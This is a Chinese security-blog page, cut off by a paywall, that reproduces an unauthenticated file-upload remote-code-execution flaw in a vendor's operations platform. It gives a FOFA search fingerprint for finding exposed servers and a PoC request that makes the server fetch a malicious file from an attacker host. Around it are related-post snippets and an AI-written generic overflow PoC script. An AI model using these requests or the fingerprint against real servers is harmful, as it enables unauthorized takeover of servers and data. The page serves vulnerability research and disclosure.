某科聚网一体化运营平台 多处 文件上传致RCE漏洞复现

已于 2024-05-04 14:49:11 修改
阅读量975 收藏 1
点赞数 16
分类专栏: 漏洞复现v1 文章标签: 安全 web安全
于 2024-04-30 18:05:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/138353221
版权
本文介绍了某科聚网一体化运营平台存在的catchByUrl、ue/word、radioupload等接口文件上传漏洞,详细阐述了漏洞概述、复现环境,并提供了多条PoC进行漏洞验证。修复建议包括限制接口访问权限和更新到安全版本。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x01 产品简介

某科聚网一体化运营平台是一种综合性的软件平台,旨在帮助企业实现运营管理的集中化、自动化和协同化。该平台通常提供一系列功能模块和工具,用于支持企业在销售、营销、客户关系管理、供应链管理、人力资源管理等方面的运营活动。

0x02 漏洞概述

某科聚网一体化运营平台 catchByUrl、ue/word、radioupload等接口存在文件上传漏洞,未经身份验证的攻击者可利用此漏洞上传后门文件,执行任意指令,从而获取服务器权限。

0x03 复现环境

FOFA:body="thirdparty/ueditor/WordPaster"

0x04 漏洞复现

PoC-1

GET /resources/files/ue/catchByUrl?url=http://vpsip/恶意文件 HTTP/1.1 
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept-Enc
了解本专栏 订阅专栏 解锁全文 超级会员免费看
漏洞复现北京中科一体化运营平台-任意文件上传-catchByUrl
知黑而守白
06-20 343
北京中科信息技术有限公司(简称:中)是一家致力于大中型站建设、企业内部资源管理与大数据检索应用,获得了北京市专项资金扶植的软件企业。中为政府企业客户提供资源管理、数据检索应用产品和整体解决方案及提供高端的技术顾问与咨询。北京中科信息技术有限公司一体化运营平台catchByUrl接口存处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
漏洞复现北京中科一体化运营平台catchByUrl存在文件上传漏洞
失心少年
05-02 480
技术文章仅供参考,任何个人和组织使用络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!北京中科一体化运营平台 catchByUrl存在文件上传漏洞,未经身份验证的攻击者可利用此漏洞上传后门文件,从而获取服务器权限。
FastAdmin_Upload:FastAdmin 前台文件上传RCE
04-06
FastAdmin Upload Exploit FastAdmin 前台文件上传RCE Usage: python fastadmin.py url 默认Webshell密码为hhh
RCE和php文件上传
m0_71332744的博客
07-30 1474
安全领域,远程命令执行(RCE)和文件上传漏洞是两种常见的攻击方式。本文将带大家深入了解这两种漏洞的原理、利用方法以及如何进行有效防御。
压缩包文件上传导致覆盖rce
yggcwhat
01-31 714
压缩包文件上传导致覆盖rce
飞企互联-FE企业运营管理平台 多处 SQL注入致RCE漏洞复现
0xSec
06-28 1136
飞企互联-FE企业运营管理平台 checkGroupCode、efficientCodewidget39、ajax_codewidget39等接口存在SQL注入漏洞,未经授权攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
顺景ERP 多处 任意文件上传RCE漏洞复现
0xSec
08-21 326
顺景ERP Upload、UploadInvtSpFile、UploadInvtSpBuzPlanFile等多处接口存在任意文件上传漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
JEPaaS 低代码平台 document/file 文件上传RCE漏洞复现
0xSec
05-29 1145
JEPaaS 低代码平台 document/file 接口存在文件上传漏洞,未经身份验证的远程攻击者可利用内部默认的key参数绕过权限认证上传任意文件,在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
时空WMS-仓储精细化管理系统 SaveCrash.ashx 文件上传RCE漏洞复现
0xSec
11-29 794
时空WMS-仓储精细化管理系统 SaveCrash.ashx 接口存在文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
[ 漏洞复现篇 ] 通达 OA11.6 文件上传+RCE 漏洞复现
qq_51577576的博客
04-14 5188
一、漏洞编号 二、漏洞靶场 三、漏洞影响版本 四、FOFA Dork/Google Dork 五、利用漏洞风险 六、漏洞修复方案 七、漏洞利用过程
spring-boot-upload-file-lead-to-rce-tricks:spring boot Fat Jar 应用文件上传漏洞RCE 的利用技巧
04-12
spring-boot-upload-file-lead-to-rce-tricks 一. docker 漏洞环境搭建 docker pull landgrey/spring-boot-fat-jar-write-file-rce:1.2 docker run -d -p 18081:18081 landgrey/spring-boot-fat-jar-write-file-rce:1.2 完成后访问 二. 相关文章 三. 常见 JDK 目录收集 欢迎提 issue 补充:clapping_hands:~ /usr/lib/jvm/java-8-oracle/jre/lib/ /usr/lib/jvm/java-1.8-openjdk/jre/lib/ /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/ 四. docker 漏洞环境的功能 文件上传功能 (默认上传到 /tmp/ 目录,
无数字字母webshell之上传临时文件RCE
snowlyzz的博客
08-11 1145
新姿势,上传临时文件rce
文件上传漏洞、XSS漏洞RCE漏洞
Fly_Mojito的博客
05-27 1340
文件上传漏洞、XXS漏洞RCE漏洞
RCE/文件包含/文件上传基本利用手法
actistsec的博客
10-22 1607
记录RCE/文件上传/文件包含的几种利用
从文件包含到RCE方法
12-10 1359
大家在参加众测的行动时,若是发现了以下基础危害不大的漏洞,不建议直接提交的,而是应该想办法看,能不能对该漏洞进行升级,扩大其危害,多拿点奖励。当然,文件包含不算常见,经常出现在php程序中远程文件包含(RFI)通过上传上传任意格式后缀包含shell代码的文件,然后包含该文件即可。通过apache日志中间件的日志是及其容易受到文件包含攻击的,例如:可以通过在GET URL时,在参数中填写,这样,恶意内容就会被包含到web日志中,在通过包含该日志,即可成功的进行代码执行。常见中间件日志位置。
【土木人自学安Day3】文件上传漏洞介绍与绕过的简单应用
qq_44117967的博客
02-29 1084
文件上传漏洞介绍与绕过的简单应用
Eking管理易 Html5Upload 前台任意文件上传漏洞复现
iSee857的博客
10-14 827
EKing-管理易/Html5Upload 接口存在前台任意文件上传漏洞,未经身份验证的远程攻击者可利用此漏洞上传任意文件,在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。该漏洞需要通过/Html5Upload 接口分三步进行操作,通过Html5Upload 接口依次进行文件名创建,数据上传,文件保存。是一款专为广告制品制作企业量身定制的管理软件产品,旨在帮助企业实现规范化、学化管理,提升运营效率和降低运营成本。官方已发布补丁 请即时修复。webshell构建。
pikachu(RCE+文件包含+任意文件下载)
qq_47804678的博客
03-13 766
所以,一些能涉及到命令执行,且其中有可控参数的情况,我们就可以利用这个来构造一下恶意命令,执行来得到我们想要的信息。后续可以利用反弹shell或者请求下载攻击者服务器上的恶意shell脚本再执行。
易优cms后台RCE以及任意文件上传漏洞
weixin_30415113的博客
07-31 4047
前言 EyouCms是基于TP5.0框架为核心开发的免费+开源的企业内容管理系统,专注企业建站用户需求提供海量各行业模板,降低中小企业站建设、络营销成本,致力于打造用户舒适的建站体验。易优cms v1.3.7后台插件模块存在代码执行漏洞。 正文 Weapp.php文件中的create()方法接收了请求中的参数,过滤后直接存入php配置文件中,但是由于过滤不严,导致可以直接写...
rce漏洞复现
最新发布
03-28
### 关于远程代码执行(RCE)漏洞复现的方法 #### 背景介绍 远程代码执行(Remote Code Execution, RCE)是一种高危漏洞,允许攻击者在未授权的情况下,在目标系统的上下文中运行任意代码。这种类型的漏洞通常存在络服务、Web 应用程序或其他暴露在络中的软件中。 #### 复现步骤概述 以下是基于已知案例的通用复现流程: 1. **环境搭建** 需要创建一个模拟真实场景的测试环境来重现漏洞行为。例如,可以使用虚拟机或容器技术隔离实验环境[^4]。 2. **工具准备** 准备必要的开发和调试工具链,包括但不限于 Python 脚本、Metasploit 模块以及其他辅助工具。对于某些特定漏洞,还需要安装对应的依赖库[^1]。 3. **分析漏洞原理** 对具体漏洞的工作机制进行深入研究。比如 CVE-2020-0796 是由于 SMB 协议处理不当引起的 RCE 漏洞,了解其触发条件至关重要[^2]。 4. **编写利用脚本** 根据漏洞特性设计相应的 Payload 或 Exploit 脚本来实现远程代码注入功能。如果存在返回导向编程(ROP),则需额外考虑如何规避 ASLR 和 DEP 等防护措施。 5. **测试与调整** 尝试多次运行编写的 POC (Proof of Concept), 并依据反馈不断优化直至成功达成预期效果为止。 #### 实际案例解析 - PHP 缓冲区溢出漏洞 在一个实际的例子当中提到过有关 iconv() 的调用问题最后却意外发现该缺陷非常适合应用于 PHP 应用层面造成严重的后果[^3]: ```php <?php // 假设这里有一个可控输入参数 $data $data = $_GET['input']; $converted_data = iconv('UTF-8', 'ISO-8859-1//IGNORE', $data); echo $converted_data; ?> ``` 上述代码片段展示了当用户提交的数据长度超过预定义缓冲大小时可能会引发堆栈破坏进而导致不可预测的行为发生。 --- ### 提供一段简单的 IPv6-RCE PoC 示例代码如下所示: ```python import socket def send_payload(ip_address): payload = b"A"*1024 # 构造超长字符串作为载荷尝试覆盖内存区域 try: sckt = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) sckt.connect((ip_address, 80)) sckt.sendall(payload) response = sckt.recv(1024).decode() print(f"Received Response: {response}") except Exception as e: print(e) if __name__ == "__main__": target_ip = "<目标IPv6地址>" send_payload(target_ip) ``` 注意替换 `<目标IPv6地址>` 成真实的 IP 地址前缀后再执行以上脚本。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值